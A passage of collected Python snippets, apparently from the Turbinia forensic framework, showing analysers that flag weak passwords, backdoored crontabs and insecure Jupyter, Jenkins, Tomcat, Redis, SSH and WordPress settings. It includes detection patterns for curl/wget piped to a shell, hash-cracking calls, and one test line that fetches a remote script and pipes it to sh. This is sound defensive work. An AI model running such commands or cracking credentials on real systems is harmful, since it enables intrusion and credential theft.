Example #1
 def analyse_shadow_file(self, shadow, hashes):
   """Analyses a Linux shadow file.
   Args:
     shadow (list): shadow file content (list of str).
     hashes (dict): dict of hashes to usernames
   Returns:
     Tuple(
       report_text(str): The report data
       report_priority(int): The priority of the report (0 - 100)
       summary(str): A summary of the report (used for task status)
     )
   """
   report = []
   summary = 'No weak passwords found'
   priority = Priority.LOW
   weak_passwords = bruteforce_password_hashes(shadow)
   if weak_passwords:
     priority = Priority.CRITICAL
     summary = 'Shadow file analysis found {0:n} weak password(s)'.format(
         len(weak_passwords))
     report.insert(0, fmt.heading4(fmt.bold(summary)))
     line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
     report.append(fmt.bullet(fmt.bold(line)))
     for password_hash, plaintext in weak_passwords:
       line = """User '{0:s}' with password '{1:s}'""".format(
           hashes[password_hash], plaintext)
       report.append(fmt.bullet(line, level=2))
   report = '\n'.join(report)
   return (report, priority, summary)
Example #2
    def analyse_crontab(self, crontab):
        """Analyses a Cron file.

    Args:
      crontab (str): file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        wget_or_curl = re.compile(r'(wget|curl)', re.IGNORECASE | re.MULTILINE)
        pipe_to_sh = re.compile(r'\|(.*)sh ', re.IGNORECASE | re.MULTILINE)
        get_piped_to_sh = re.compile(r'((wget|curl).*\|)+(.*sh)',
                                     re.IGNORECASE | re.MULTILINE)

        if re.search(get_piped_to_sh, crontab):
            findings.append(
                fmt.bullet('Remote file retrieval piped to a shell.'))
        elif re.search(wget_or_curl, crontab):
            findings.append(fmt.bullet('Remote file retrieval'))
        elif re.search(pipe_to_sh, crontab):
            findings.append(fmt.bullet('File piped to shell'))

        if findings:
            summary = 'Potentially backdoored crontab found.'
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, summary)

        report = 'No issues found in crontabs'
        return (report, Priority.LOW, report)
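A quick way to sanity-check the patterns above is to run the strictest one against a known-bad entry. This is a standalone sketch, not part of the task; the crontab line is invented for illustration.

import re

get_piped_to_sh = re.compile(r'((wget|curl).*\|)+(.*sh)',
                             re.IGNORECASE | re.MULTILINE)
# Hypothetical entry: fetches a remote script and pipes it straight to a shell.
sample = '*/5 * * * * curl -s http://198.51.100.7/a.sh | sh'
assert get_piped_to_sh.search(sample) is not None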
Example #3
    def format_task_detail(self, task, show_files=False):
        """Formats a single task in detail.

    Args:
      task (dict): The task to format data for
      show_files (bool): Whether we want to print out log file paths

    Returns:
      list: Formatted task data
    """
        report = []
        saved_paths = task.get('saved_paths') or []
        status = task.get('status') or 'No task status'

        report.append(fmt.heading2(task.get('name')))
        line = '{0:s} {1:s}'.format(fmt.bold('Status:'), status)
        report.append(fmt.bullet(line))
        report.append(fmt.bullet('Task Id: {0:s}'.format(task.get('id'))))
        report.append(
            fmt.bullet('Executed on worker {0:s}'.format(
                task.get('worker_name'))))
        if task.get('report_data'):
            report.append('')
            report.append(fmt.heading3('Task Reported Data'))
            report.extend(task.get('report_data').splitlines())
        if show_files:
            report.append('')
            report.append(fmt.heading3('Saved Task Files:'))
            for path in saved_paths:
                report.append(fmt.bullet(fmt.code(path)))
            report.append('')
        return report
Example #4
    def _ProcessPartition(self, path_spec):
        """Generate RawDiskPartition from a PathSpec.

    Args:
      path_spec (dfvfs.PathSpec): dfVFS path spec.

    Returns:
      A list of strings containing partition information to add to the status
      report.
    """
        status_report = []

        location = getattr(path_spec, 'location', None)
        if location in ('/', '\\'):
            path_spec = path_spec.parent
            location = getattr(path_spec, 'location', None)
        status_report.append(fmt.heading5('{0!s}:'.format(location)))
        # APFS volumes will have a volume_index
        volume_index = getattr(path_spec, 'volume_index', None)
        if volume_index is not None:
            status_report.append(
                fmt.bullet('Volume index: {0!s}'.format(volume_index)))
        # The part_index and start_offset come from the TSK partition
        # APFS volumes will have a TSK partition as a parent
        if not getattr(path_spec, 'part_index', None):
            path_spec = path_spec.parent
        status_report.append(
            fmt.bullet('Partition index: {0!s}'.format(
                getattr(path_spec, 'part_index', None))))
        status_report.append(
            fmt.bullet('Partition offset: {0!s}'.format(
                getattr(path_spec, 'start_offset', None))))
        return status_report
Example #5
  def _AnalyzeHadoopAppRoot(self, collected_artifacts, output_dir):
    """Runs a naive AppRoot files parsing method.

    This extracts strings from the saved task file, and searches for usual
    post-compromise suspicious patterns.

    TODO: properly parse the Proto. Some documentation can be found over there:
    https://svn.apache.org/repos/asf/hadoop/common/branches/branch-0.23.7/hadoop-yarn-project/hadoop-yarn/hadoop-yarn-api/src/main/proto/yarn_protos.proto

    Args:
      collected_artifacts(list(str)): a list of paths to extracted files
      output_dir(str): The base directory the artifacts are in.

    Returns:
      Tuple(
        list(str): The report data as a list of lines
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
    report = []
    evil_commands = []
    strings_count = 0
    priority = Priority.MEDIUM
    summary = ''
    for filepath in collected_artifacts:
      relpath = os.path.relpath(filepath, output_dir)
      command = 'strings -a "{0:s}"'.format(filepath)
      log.debug('Running command [{0:s}]'.format(command))
      proc = subprocess.Popen(
          command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
      strings_output, _ = proc.communicate()
      strings_output = codecs.decode(strings_output, 'utf-8')
      for line in strings_output.splitlines():
        strings_count += 1
        if (line.find('curl') >= 0) or (line.find('wget') >= 0):
          evil_commands.append((relpath, line))

    if evil_commands:
      msg = 'Found suspicious commands!'
      report.append(fmt.heading4(fmt.bold(msg)))
      summary = msg
      priority = Priority.CRITICAL
    else:
      msg = 'Did not find any suspicious commands.'
      report.append(fmt.heading4(msg))
      summary = msg

    for filepath, command in evil_commands:
      report.append(fmt.bullet(fmt.bold('Command:')))
      report.append(fmt.code(command))
      report.append('Found in file:')
      report.append(fmt.code(filepath))

    msg = 'Extracted {0:d} strings from {1:d} file(s)'.format(
        strings_count, len(collected_artifacts))
    report.append(fmt.bullet(msg))

    return (report, priority, summary)
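The strings extraction above shells out with shell=True on an interpolated path. A minimal alternative sketch (assuming the strings binary is on PATH; the file path here is hypothetical) passes an argument vector instead, which sidesteps shell quoting:

import codecs
import subprocess

# Argument vector instead of an interpolated command string.
proc = subprocess.Popen(['strings', '-a', '/tmp/app_root_file'],
                        stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
strings_output, _ = proc.communicate()
strings_output = codecs.decode(strings_output, 'utf-8')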
Example #6
    def analyse_config(self, jupyter_config):
        """Extract security related configs from Jupyter configuration files.

    Args:
      jupyter_config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        num_misconfigs = 0
        for line in jupyter_config.split('\n'):

            if all(x in line for x in ['disable_check_xsrf', 'True']):
                findings.append(fmt.bullet('XSRF protection is disabled.'))
                num_misconfigs += 1
                continue
            if all(x in line for x in ['allow_root', 'True']):
                findings.append(
                    fmt.bullet('Jupyter Notebook allowed to run as root.'))
                num_misconfigs += 1
                continue
            if 'NotebookApp.password' in line:
                if all(x in line for x in ['required', 'False']):
                    findings.append(
                        fmt.bullet(
                            'Password is not required to access this Jupyter Notebook.'
                        ))
                    num_misconfigs += 1
                    continue
                if 'required' not in line:
                    password_hash = line.split('=')
                    if len(password_hash) > 1:
                        if password_hash[1].strip() == "''":
                            findings.append(
                                fmt.bullet(
                                    'There is no password set for this Jupyter Notebook.'
                                ))
                            num_misconfigs += 1
            if all(x in line for x in ['allow_remote_access', 'True']):
                findings.append(
                    fmt.bullet(
                        'Remote access is enabled on this Jupyter Notebook.'))
                num_misconfigs += 1
                continue

        if findings:
            summary = 'Insecure Jupyter Notebook configuration found. Total misconfigs: {}'.format(
                num_misconfigs)
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, summary)

        report = 'No issues found in Jupyter Notebook configuration.'
        return (report, Priority.LOW, report)
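As a minimal illustration, a single (invented) line from a Jupyter configuration file satisfies the substring checks above and would yield the XSRF finding:

sample_line = 'c.NotebookApp.disable_check_xsrf = True'
assert all(x in sample_line for x in ['disable_check_xsrf', 'True'])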
Example #7
    def analyze_jenkins(version, credentials, timeout=300):
        """Analyses a Jenkins configuration.

    Args:
      version (str): Version of Jenkins.
      credentials (list): List of tuples with username and password hash.
      timeout (int): Time in seconds to run password bruteforcing.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = ''
        priority = Priority.LOW
        credentials_registry = {
            hash: username
            for username, hash in credentials
        }

        # '3200' is "bcrypt $2*$, Blowfish (Unix)"
        weak_passwords = bruteforce_password_hashes(
            credentials_registry.keys(),
            tmp_dir=None,
            timeout=timeout,
            extra_args='-m 3200')

        if not version:
            version = 'Unknown'
        report.append(fmt.bullet('Jenkins version: {0:s}'.format(version)))

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Jenkins analysis found potential issues'
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = 'User "{0:s}" with password "{1:s}"'.format(
                    credentials_registry.get(password_hash), plaintext)
                report.append(fmt.bullet(line, level=2))
        elif credentials_registry or version != 'Unknown':
            summary = (
                'Jenkins version {0:s} found with {1:d} credentials, but no issues '
                'detected'.format(version, len(credentials_registry)))
            report.insert(0, fmt.heading4(summary))
            priority = Priority.MEDIUM
        else:
            summary = 'No Jenkins instance found'
            report.insert(0, fmt.heading4(summary))

        report = '\n'.join(report)
        return (report, priority, summary)
Example #8
 def testFormatting(self):
     """Test text formatting."""
     self.assertEqual('**testing**', fmt.bold(self.test_string))
     self.assertEqual('# testing', fmt.heading1(self.test_string))
     self.assertEqual('## testing', fmt.heading2(self.test_string))
     self.assertEqual('### testing', fmt.heading3(self.test_string))
     self.assertEqual('#### testing', fmt.heading4(self.test_string))
     self.assertEqual('##### testing', fmt.heading5(self.test_string))
     self.assertEqual('* testing', fmt.bullet(self.test_string))
     self.assertEqual('        * testing',
                      fmt.bullet(self.test_string, level=3))
     self.assertEqual('`testing`', fmt.code(self.test_string))
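The assertions above fully pin down the expected markdown output. A minimal sketch of a formatter consistent with them (the real turbinia fmt module may differ in details) could look like:

def bold(text):
  # Markdown bold.
  return '**{0:s}**'.format(text)

def heading1(text):
  # Markdown heading; heading2 through heading5 add one more '#' each.
  return '# {0:s}'.format(text)

def bullet(text, level=1):
  # Markdown bullet, indented four spaces per level beyond the first.
  return '{0:s}* {1:s}'.format('    ' * (level - 1), text)

def code(text):
  # Inline markdown code span.
  return '`{0:s}`'.format(text)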
Example #9
    def analyze_jenkins(version, credentials):
        """Analyses a Jenkins configuration.

    Args:
      version (str): Version of Jenkins.
      credentials (list): List of tuples with username and password hash.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = ''
        priority = Priority.LOW
        credentials_registry = {
            hash: username
            for username, hash in credentials
        }
        # TODO: Add timeout parameter when dynamic configuration is ready.
        # Ref: https://github.com/google/turbinia/issues/244
        weak_passwords = bruteforce_password_hashes(
            credentials_registry.keys())

        if not version:
            version = 'Unknown'
        report.append(fmt.bullet('Jenkins version: {0:s}'.format(version)))

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Jenkins analysis found potential issues'
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = 'User "{0:s}" with password "{1:s}"'.format(
                    credentials_registry.get(password_hash), plaintext)
                report.append(fmt.bullet(line, level=2))
        elif credentials_registry or version != 'Unknown':
            summary = (
                'Jenkins version {0:s} found with {1:d} credentials, but no issues '
                'detected'.format(version, len(credentials_registry)))
            report.insert(0, fmt.heading4(summary))
            priority = Priority.MEDIUM
        else:
            summary = 'No Jenkins instance found'
            report.insert(0, fmt.heading4(summary))

        report = '\n'.join(report)
        return (report, priority, summary)
Example #10
    def analyse_tomcat_file(self, tomcat_file):
        """Analyse a Tomcat file.

    - Search for clear text password entries in user configuration file
    - Search for .war deployment
    - Search for management control panel activity

    Args:
      tomcat_file (str): Tomcat file content.
    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []

        tomcat_user_passwords_re = re.compile('(^.*password.*)', re.MULTILINE)
        tomcat_deploy_re = re.compile(
            '(^.*Deploying web application archive.*)', re.MULTILINE)
        tomcat_manager_activity_re = re.compile(
            '(^.*POST /manager/html/upload.*)', re.MULTILINE)

        count = 0
        for password_entry in re.findall(tomcat_user_passwords_re,
                                         tomcat_file):
            findings.append(
                fmt.bullet('Tomcat user: ' + password_entry.strip()))
            count += 1

        for deployment_entry in re.findall(tomcat_deploy_re, tomcat_file):
            findings.append(
                fmt.bullet('Tomcat App Deployed: ' + deployment_entry.strip()))
            count += 1

        for mgmt_entry in re.findall(tomcat_manager_activity_re, tomcat_file):
            findings.append(
                fmt.bullet('Tomcat Management: ' + mgmt_entry.strip()))
            count += 1

        if findings:
            msg = 'Tomcat analysis found {0:d} results'.format(count)
            findings.insert(0, fmt.heading4(fmt.bold(msg)))
            report = '\n'.join(findings)
            return (report, Priority.HIGH, msg)

        report = 'No Tomcat findings to report'
        return (report, Priority.LOW, report)
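For reference, a sample (invented) Catalina log line that the deployment pattern above captures:

import re

tomcat_deploy_re = re.compile('(^.*Deploying web application archive.*)',
                              re.MULTILINE)
line = 'INFO Deploying web application archive /opt/tomcat/webapps/shell.war'
assert tomcat_deploy_re.search(line) is not None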
Example #11
    def testPartitionEnumerationRun(self, mock_getbasepathspecs):
        """Test PartitionEnumeration task run."""
        os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location='test.dd')
        raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=os_path_spec)
        tsk_p1_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p1',
            part_index=2,
            start_offset=1048576)
        ntfs_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p1_spec,
            location='\\')

        tsk_p2_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p2',
            part_index=6,
            start_offset=11534336)
        tsk_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p2_spec,
            location='/')

        mock_getbasepathspecs.return_value = [ntfs_spec, tsk_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        self.assertIsInstance(result, TurbiniaTaskResult)
        self.assertEqual(result.task_name, 'PartitionEnumerationTask')
        self.assertEqual(len(result.evidence), 2)
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 2 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/p1:'))
        expected_report.append(fmt.bullet('Partition index: 2'))
        expected_report.append(fmt.bullet('Partition offset: 1048576'))
        expected_report.append(fmt.heading5('/p2:'))
        expected_report.append(fmt.bullet('Partition index: 6'))
        expected_report.append(fmt.bullet('Partition offset: 11534336'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Example #12
    def testPartitionEnumerationRunAPFS(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run on APFS."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data', 'apfs.raw')

        test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        test_raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=test_os_path_spec)
        test_apfs_container_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_APFS_CONTAINER,
            location='/apfs1',
            volume_index=0,
            parent=test_raw_path_spec)

        mock_getbasepathspecs.return_value = [test_apfs_container_path_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/apfs1:'))
        expected_report.append(fmt.bullet('Volume index: 0'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Example #13
    def testPartitionEnumerationRunLVM(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run on LVM."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data', 'lvm.raw')

        test_os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        test_raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=test_os_path_spec)
        test_lvm_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_LVM,
            location='/lvm1',
            parent=test_raw_path_spec)
        test_xfs_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_XFS,
            location='/',
            parent=test_lvm_path_spec)

        mock_getbasepathspecs.return_value = [test_xfs_path_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/lvm1:'))
        expected_report.append(fmt.bullet('Source evidence is a volume image'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Example #14
  def analyse_redis_config(self, config):
    """Analyses a Redis configuration.

    Args:
      config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
    findings = []
    bind_everywhere_re = re.compile(
        r'^\s*bind[\s"]*0\.0\.0\.0', re.IGNORECASE | re.MULTILINE)

    if re.search(bind_everywhere_re, config):
      findings.append(fmt.bullet('Redis listening on every IP'))

    if findings:
      summary = 'Insecure Redis configuration found.'
      findings.insert(0, fmt.heading4(fmt.bold(summary)))
      report = '\n'.join(findings)
      return (report, Priority.HIGH, summary)

    report = 'No issues found in Redis configuration'
    return (report, Priority.LOW, report)
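The bind-everywhere pattern matches a plain bind directive at the start of a line; a quick standalone check with an invented config fragment:

import re

bind_everywhere_re = re.compile(
    r'^\s*bind[\s"]*0\.0\.0\.0', re.IGNORECASE | re.MULTILINE)
assert bind_everywhere_re.search('bind 0.0.0.0\nport 6379') is not None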
Example #15
  def format_task(self, task, show_files=False):
    """Formats a single task in short form.

    Args:
      task (dict): The task to format data for
      show_files (bool): Whether we want to print out log file paths

    Returns:
      list: Formatted task data
    """
    report = []
    saved_paths = task.get('saved_paths') or []
    status = task.get('status') or 'No task status'
    report.append(fmt.bullet('{0:s}: {1:s}'.format(task.get('name'), status)))
    if show_files:
      for path in saved_paths:
        report.append(fmt.bullet(fmt.code(path), level=2))
      report.append('')
    return report
Example #16
    def analyze_wp_access_logs(self, config):
        """Analyses access logs containing Wordpress traffic.

    Args:
      config (str): access log file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        findings_summary = set()

        for log_line in config.split('\n'):

            if self.install_step_regex.search(log_line):
                line = '{0:s}: Wordpress installation successful'.format(
                    self._get_timestamp(log_line))
                report.append(fmt.bullet(line))
                findings_summary.add('install')

            match = self.theme_editor_regex.search(log_line)
            if match:
                line = '{0:s}: Wordpress theme editor edited file ({1:s})'.format(
                    self._get_timestamp(log_line), match.group('edited_file'))
                report.append(fmt.bullet(line))
                findings_summary.add('theme_edit')

        if report:
            findings_summary = ', '.join(sorted(list(findings_summary)))
            summary = 'Wordpress access logs found ({0:s})'.format(
                findings_summary)

            report.insert(0, fmt.heading4(fmt.bold(summary)))
            report_text = '\n'.join(report)
            return (report_text, Priority.HIGH, summary)

        report_text = 'No Wordpress install or theme editing found in access logs'
        return (fmt.heading4(report_text), Priority.LOW, report_text)
Example #17
  def format_worker_task(self, task):
    """Formats a single task for Worker view.

    Args:
      task (dict): The task to format data for
    Returns:
      list: Formatted task data
    """
    report = []
    report.append(
        fmt.bullet('{0:s} - {1:s}'.format(task['task_id'], task['task_name'])))
    report.append(
        fmt.bullet(
            'Last Update: {0:s}'.format(
                task['last_update'].strftime(DATETIME_FORMAT)), level=2))
    report.append(fmt.bullet('Status: {0:s}'.format(task['status']), level=2))
    report.append(
        fmt.bullet('Run Time: {0:s}'.format(str(task['run_time'])), level=2))
    report.append('')
    return report
Example #18
  def runLoki(self, result, evidence):
    log_file = os.path.join(self.output_dir, 'loki.log')
    stdout_file = os.path.join(self.output_dir, 'loki_stdout.log')
    stderr_file = os.path.join(self.output_dir, 'loki_stderr.log')

    cmd = [
        'python', '/opt/loki/loki.py', '-w', '0', '--csv', '--intense',
        '--noprocscan', '--dontwait', '--noindicator', '-l', log_file, '-p',
        evidence.local_path
    ]

    (ret, result) = self.execute(
        cmd, result, log_files=[log_file], stdout_file=stdout_file,
        stderr_file=stderr_file, cwd='/opt/loki/')

    if ret != 0:
      raise TurbiniaException('Return code: {0:d}'.format(ret))

    report = []
    summary = 'No Loki threats found'
    priority = Priority.LOW

    report_lines = []
    with open(stdout_file, 'r') as loki_report_csv:
      lokireader = csv.DictReader(
          loki_report_csv, fieldnames=['Time', 'Hostname', 'Level', 'Log'])
      for row in lokireader:
        if row['Level'] == 'ALERT':
          report_lines.append(row['Log'])

    if report_lines:
      priority = Priority.HIGH
      summary = 'Loki analysis found {0:d} alert(s)'.format(len(report_lines))
      report.insert(0, fmt.heading4(fmt.bold(summary)))
      line = '{0:n} alert(s) found:'.format(len(report_lines))
      report.append(fmt.bullet(fmt.bold(line)))
      for line in report_lines:
        report.append(fmt.bullet(line, level=2))

    report = '\n'.join(report)
    return (report, priority, summary)
Example #19
    def testPartitionEnumerationRun(self, mock_getbasepathspecs, _):
        """Test PartitionEnumeration task run."""
        self.result.setup(self.task)
        filedir = os.path.dirname(os.path.realpath(__file__))
        test_data = os.path.join(filedir, '..', '..', 'test_data',
                                 'tsk_volume_system.raw')

        os_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_OS, location=test_data)
        raw_path_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_RAW, parent=os_path_spec)
        tsk_p2_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_TSK_PARTITION,
            parent=raw_path_spec,
            location='/p2',
            part_index=6,
            start_offset=180224)
        tsk_spec = path_spec_factory.Factory.NewPathSpec(
            dfvfs_definitions.TYPE_INDICATOR_NTFS,
            parent=tsk_p2_spec,
            location='/')

        mock_getbasepathspecs.return_value = [tsk_spec]

        result = self.task.run(self.evidence, self.result)

        # Ensure run method returns a TurbiniaTaskResult instance.
        self.assertIsInstance(result, TurbiniaTaskResult)
        self.assertEqual(result.task_name, 'PartitionEnumerationTask')
        self.assertEqual(len(result.evidence), 1)
        expected_report = []
        expected_report.append(
            fmt.heading4('Found 1 partition(s) in [{0:s}]:'.format(
                self.evidence.local_path)))
        expected_report.append(fmt.heading5('/p2:'))
        expected_report.append(fmt.bullet('Partition index: 6'))
        expected_report.append(fmt.bullet('Partition offset: 180224'))
        expected_report.append(fmt.bullet('Partition size: 1294336'))
        expected_report = '\n'.join(expected_report)
        self.assertEqual(result.report_data, expected_report)
Example #20
    def _analyse_wordpress_creds(self, creds, hashnames, timeout=300):
        """Attempt to brute force extracted Wordpress credentials.

    Args:
        creds (list): List of strings containing raw extracted credentials
        hashnames (dict): Dict mapping hash back to username for convenience.
        timeout (int): How long to spend cracking.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = 'No weak passwords found'
        priority = Priority.LOW

        # 400 is "phpass"
        weak_passwords = bruteforce_password_hashes(
            creds,
            tmp_dir=self.tmp_dir,
            timeout=timeout,
            extra_args='--username -m 400')

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Wordpress analysis found {0:d} weak password(s)'.format(
                len(weak_passwords))
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                if password_hash in hashnames:
                    line = """User '{0:s}' with password '{1:s}'""".format(
                        hashnames[password_hash], plaintext)
                    report.append(fmt.bullet(line, level=2))
        report = '\n'.join(report)
        return (report, priority, summary)
Example #21
    def analyse_sshd_config(self, config):
        """Analyses an SSH configuration.

    Args:
      config (str): configuration file content.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        findings = []
        permit_root_login_re = re.compile(
            r'^\s*PermitRootLogin\s*(yes|prohibit-password|without-password)',
            re.IGNORECASE | re.MULTILINE)
        password_authentication_re = re.compile(
            r'^\s*PasswordAuthentication[\s"]*No',
            re.IGNORECASE | re.MULTILINE)
        permit_empty_passwords_re = re.compile(
            r'^\s*PermitEmptyPasswords[\s"]*Yes', re.IGNORECASE | re.MULTILINE)

        if re.search(permit_root_login_re, config):
            findings.append(fmt.bullet('Root login enabled.'))

        if not re.search(password_authentication_re, config):
            findings.append(fmt.bullet('Password authentication enabled.'))

        if re.search(permit_empty_passwords_re, config):
            findings.append(fmt.bullet('Empty passwords permitted.'))

        if findings:
            summary = 'Insecure SSH configuration found.'
            findings.insert(0, fmt.heading4(fmt.bold(summary)))
            report = '\n'.join(findings)
            return (report, 20, summary)

        report = 'No issues found in SSH configuration'
        return (report, 60, report)
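As an invented two-line sshd_config fragment, the following would be flagged twice by the checks above: once for root login, and once because password authentication is never explicitly disabled:

sample_config = 'PermitRootLogin yes\nPasswordAuthentication yes'
# -> findings: 'Root login enabled.' and 'Password authentication enabled.'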
Example #22
    def analyse_shadow_file(self, shadow, hashes, timeout=300):
        """Analyses a Linux shadow file.

    Args:
      shadow (list): shadow file content (list of str).
      hashes (dict): dict of hashes to usernames
      timeout (int): Time in seconds to run password bruteforcing.

    Returns:
      Tuple(
        report_text(str): The report data
        report_priority(int): The priority of the report (0 - 100)
        summary(str): A summary of the report (used for task status)
      )
    """
        report = []
        summary = 'No weak passwords found'
        priority = Priority.LOW

        # 1800 is "sha512crypt $6$, SHA512 (Unix)"
        weak_passwords = bruteforce_password_hashes(shadow,
                                                    tmp_dir=self.tmp_dir,
                                                    timeout=timeout,
                                                    extra_args='-m 1800')

        if weak_passwords:
            priority = Priority.CRITICAL
            summary = 'Shadow file analysis found {0:n} weak password(s)'.format(
                len(weak_passwords))
            report.insert(0, fmt.heading4(fmt.bold(summary)))
            line = '{0:n} weak password(s) found:'.format(len(weak_passwords))
            report.append(fmt.bullet(fmt.bold(line)))
            for password_hash, plaintext in weak_passwords:
                line = """User '{0:s}' with password '{1:s}'""".format(
                    hashes[password_hash], plaintext)
                report.append(fmt.bullet(line, level=2))
        report = '\n'.join(report)
        return (report, priority, summary)
Example #23
    def format_task_status(self,
                           instance,
                           project,
                           region,
                           days=0,
                           task_id=None,
                           request_id=None,
                           user=None,
                           all_fields=False,
                           full_report=False,
                           priority_filter=Priority.HIGH):
        """Formats the recent history for Turbinia Tasks.

    Args:
      instance (string): The Turbinia instance name (by default the same as the
          INSTANCE_ID in the config).
      project (string): The name of the project.
      region (string): The name of the zone to execute in.
      days (int): The number of days we want history for.
      task_id (string): The Id of the task.
      request_id (string): The Id of the request we want tasks for.
      user (string): The user of the request we want tasks for.
      all_fields (bool): Include all fields for the task, including task,
          request ids and saved file paths.
      full_report (bool): Generate a full markdown report instead of just a
          summary.
      priority_filter (int): Output only a summary for Tasks with a value
          greater than the priority_filter.

    Returns:
      String of task status
    """
        if user and days == 0:
            days = 1000
        task_results = self.get_task_data(instance, project, region, days,
                                          task_id, request_id, user)
        if not task_results:
            return ''
        # Sort all tasks by the report_priority so that tasks with a higher
        # priority are listed first in the report.
        for result in task_results:
            # 0 is a valid value, so checking against specific values
            if result.get('report_priority') in (None, ''):
                result['report_priority'] = Priority.LOW
        task_results = sorted(task_results, key=itemgetter('report_priority'))
        num_results = len(task_results)
        if not num_results:
            msg = 'No Turbinia Tasks found.'
            log.info(msg)
            return '\n{0:s}'.format(msg)

        # Build up data
        report = []
        requester = task_results[0].get('requester')
        request_id = task_results[0].get('request_id')
        success_types = ['Successful', 'Failed', 'Scheduled or Running']
        success_values = [True, False, None]
        # Reverse mapping values to types
        success_map = dict(zip(success_values, success_types))
        task_map = defaultdict(list)
        success_types.insert(0, 'High Priority')
        for task in task_results:
